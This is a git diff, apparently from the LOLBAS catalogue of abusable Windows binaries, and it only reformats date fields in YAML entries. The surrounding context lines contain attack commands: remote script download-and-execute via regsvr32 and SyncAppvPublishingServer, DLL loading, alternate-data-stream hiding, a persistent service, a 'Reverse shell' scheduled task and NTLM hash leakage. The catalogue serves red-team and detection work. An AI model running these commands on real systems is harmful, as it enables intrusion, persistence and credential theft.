Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Odbcconf.exe
|
Name: Odbcconf.exe
|
||||||
Description: Used in Windows for managing ODBC connections
|
Description: Used in Windows for managing ODBC connections
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: odbcconf -f file.rsp
|
- Command: odbcconf -f file.rsp
|
||||||
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
|
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Pcalua.exe
|
Name: Pcalua.exe
|
||||||
Description: Program Compatibility Assistant
|
Description: Program Compatibility Assistant
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: pcalua.exe -a calc.exe
|
- Command: pcalua.exe -a calc.exe
|
||||||
Description: Open the target .EXE using the Program Compatibility Assistant.
|
Description: Open the target .EXE using the Program Compatibility Assistant.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Pcwrun.exe
|
Name: Pcwrun.exe
|
||||||
Description: Program Compatibility Wizard
|
Description: Program Compatibility Wizard
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Pcwrun.exe c:\temp\beacon.exe
|
- Command: Pcwrun.exe c:\temp\beacon.exe
|
||||||
Description: Open the target .EXE file with the Program Compatibility Wizard.
|
Description: Open the target .EXE file with the Program Compatibility Wizard.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Pktmon.exe
|
Name: Pktmon.exe
|
||||||
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
|
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
|
||||||
Author: 'Derek Johnson'
|
Author: 'Derek Johnson'
|
||||||
Created: '2020-08-12'
|
Created: 2020-08-12
|
||||||
Commands:
|
Commands:
|
||||||
- Command: pktmon.exe start --etw
|
- Command: pktmon.exe start --etw
|
||||||
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
|
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Presentationhost.exe
|
Name: Presentationhost.exe
|
||||||
Description: File is used for executing Browser applications
|
Description: File is used for executing Browser applications
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
||||||
Description: Executes the target XAML Browser Application (XBAP) file
|
Description: Executes the target XAML Browser Application (XBAP) file
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Print.exe
|
Name: Print.exe
|
||||||
Description: Used by Windows to send files to the printer
|
Description: Used by Windows to send files to the printer
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
||||||
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Psr.exe
|
Name: Psr.exe
|
||||||
Description: Windows Problem Steps Recorder, used to record screen and clicks.
|
Description: Windows Problem Steps Recorder, used to record screen and clicks.
|
||||||
Author: Leon Rodenko
|
Author: Leon Rodenko
|
||||||
Created: '2020-06-27'
|
Created: 2020-06-27
|
||||||
Commands:
|
Commands:
|
||||||
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
|
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
|
||||||
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
|
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Rasautou.exe
|
Name: Rasautou.exe
|
||||||
Description: Windows Remote Access Dialer
|
Description: Windows Remote Access Dialer
|
||||||
Author: 'Tony Lambert'
|
Author: 'Tony Lambert'
|
||||||
Created: '2020-01-10'
|
Created: 2020-01-10
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
||||||
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
|
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Reg.exe
|
Name: Reg.exe
|
||||||
Description: Used to manipulate the registry
|
Description: Used to manipulate the registry
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
||||||
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regasm.exe
|
Name: Regasm.exe
|
||||||
Description: Part of .NET
|
Description: Part of .NET
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regasm.exe AllTheThingsx64.dll
|
- Command: regasm.exe AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regedit.exe
|
Name: Regedit.exe
|
||||||
Description: Used by Windows to manipulate registry
|
Description: Used by Windows to manipulate registry
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
||||||
Description: Export the target Registry key to the specified .REG file.
|
Description: Export the target Registry key to the specified .REG file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regini.exe
|
Name: Regini.exe
|
||||||
Description: Used to manipulate the registry
|
Description: Used to manipulate the registry
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2020-07-03'
|
Created: 2020-07-03
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regini.exe newfile.txt:hidden.ini
|
- Command: regini.exe newfile.txt:hidden.ini
|
||||||
Description: Write registry keys from data inside the Alternate data stream.
|
Description: Write registry keys from data inside the Alternate data stream.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Register-cimprovider.exe
|
Name: Register-cimprovider.exe
|
||||||
Description: Used to register new wmi providers
|
Description: Used to register new wmi providers
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Register-cimprovider -path "C:\folder\evil.dll"
|
- Command: Register-cimprovider -path "C:\folder\evil.dll"
|
||||||
Description: Load the target .DLL.
|
Description: Load the target .DLL.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regsvcs.exe
|
Name: Regsvcs.exe
|
||||||
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
|
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regsvr32.exe
|
Name: Regsvr32.exe
|
||||||
Description: Used by Windows to register dlls
|
Description: Used by Windows to register dlls
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Replace.exe
|
Name: Replace.exe
|
||||||
Description: Used to replace file with another file
|
Description: Used to replace file with another file
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
||||||
Description: Copy file.cab to destination
|
Description: Copy file.cab to destination
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Rpcping.exe
|
Name: Rpcping.exe
|
||||||
Description: Used to verify rpc connection
|
Description: Used to verify rpc connection
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
||||||
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Rundll32.exe
|
Name: Rundll32.exe
|
||||||
Description: Used by Windows to execute dll files
|
Description: Used by Windows to execute dll files
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
||||||
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Runonce.exe
|
Name: Runonce.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Runonce.exe /AlternateShellStartup
|
- Command: Runonce.exe /AlternateShellStartup
|
||||||
Description: Executes a Run Once Task that has been configured in the registry
|
Description: Executes a Run Once Task that has been configured in the registry
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Runscripthelper.exe
|
Name: Runscripthelper.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
||||||
Description: Execute the PowerShell script named test.txt
|
Description: Execute the PowerShell script named test.txt
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Sc.exe
|
Name: Sc.exe
|
||||||
Description: Used by Windows to manage services
|
Description: Used by Windows to manage services
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
||||||
Description: Creates a new service and executes the file stored in the ADS.
|
Description: Creates a new service and executes the file stored in the ADS.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Schtasks.exe
|
Name: Schtasks.exe
|
||||||
Description: Schedule periodic tasks
|
Description: Schedule periodic tasks
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
||||||
Description: Create a recurring task to execute every minute.
|
Description: Create a recurring task to execute every minute.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Scriptrunner.exe
|
Name: Scriptrunner.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Scriptrunner.exe -appvscript calc.exe
|
- Command: Scriptrunner.exe -appvscript calc.exe
|
||||||
Description: Executes calc.exe
|
Description: Executes calc.exe
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: SyncAppvPublishingServer.exe
|
Name: SyncAppvPublishingServer.exe
|
||||||
Description: Used by App-v to get App-v server lists
|
Description: Used by App-v to get App-v server lists
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
||||||
Description: Example command on how inject Powershell code into the process
|
Description: Example command on how inject Powershell code into the process
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Ttdinject.exe
|
Name: Ttdinject.exe
|
||||||
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
|
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
|
||||||
Author: 'Maxime Nadeau'
|
Author: 'Maxime Nadeau'
|
||||||
Created: '2020-05-12'
|
Created: 2020-05-12
|
||||||
Commands:
|
Commands:
|
||||||
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
|
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
|
||||||
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
|
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Tttracer.exe
|
Name: Tttracer.exe
|
||||||
Description: Used by Windows 1809 and newer to Debug Time Travel
|
Description: Used by Windows 1809 and newer to Debug Time Travel
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2019-11-5'
|
Created: 2019-11-05
|
||||||
Commands:
|
Commands:
|
||||||
- Command: tttracer.exe C:\windows\system32\calc.exe
|
- Command: tttracer.exe C:\windows\system32\calc.exe
|
||||||
Description: Execute calc using tttracer.exe. Requires administrator privileges
|
Description: Execute calc using tttracer.exe. Requires administrator privileges
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: vbc.exe
|
Name: vbc.exe
|
||||||
Description: Binary file used for compile vbs code
|
Description: Binary file used for compile vbs code
|
||||||
Author: Lior Adar
|
Author: Lior Adar
|
||||||
Created: 27/02/2020
|
Created: 2020-02-27
|
||||||
Commands:
|
Commands:
|
||||||
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
|
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
|
||||||
Description: Binary file used by .NET to compile vb code to .exe
|
Description: Binary file used by .NET to compile vb code to .exe
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Verclsid.exe
|
Name: Verclsid.exe
|
||||||
Description:
|
Description:
|
||||||
Author: '@bohops'
|
Author: '@bohops'
|
||||||
Created: '2018-12-04'
|
Created: 2018-12-04
|
||||||
Commands:
|
Commands:
|
||||||
- Command: verclsid.exe /S /C {CLSID}
|
- Command: verclsid.exe /S /C {CLSID}
|
||||||
Description: Used to verify a COM object before it is instantiated by Windows Explorer
|
Description: Used to verify a COM object before it is instantiated by Windows Explorer
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Wab.exe
|
Name: Wab.exe
|
||||||
Description: Windows address book manager
|
Description: Windows address book manager
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: wab.exe
|
- Command: wab.exe
|
||||||
Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice
|
Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Wmic.exe
|
Name: Wmic.exe
|
||||||
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
|
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
|
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
|
||||||
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
|
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Wscript.exe
|
Name: Wscript.exe
|
||||||
Description: Used by Windows to execute scripts
|
Description: Used by Windows to execute scripts
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: wscript c:\ads\file.txt:script.vbs
|
- Command: wscript c:\ads\file.txt:script.vbs
|
||||||
Description: Execute script stored in an alternate data stream
|
Description: Execute script stored in an alternate data stream
|
||||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user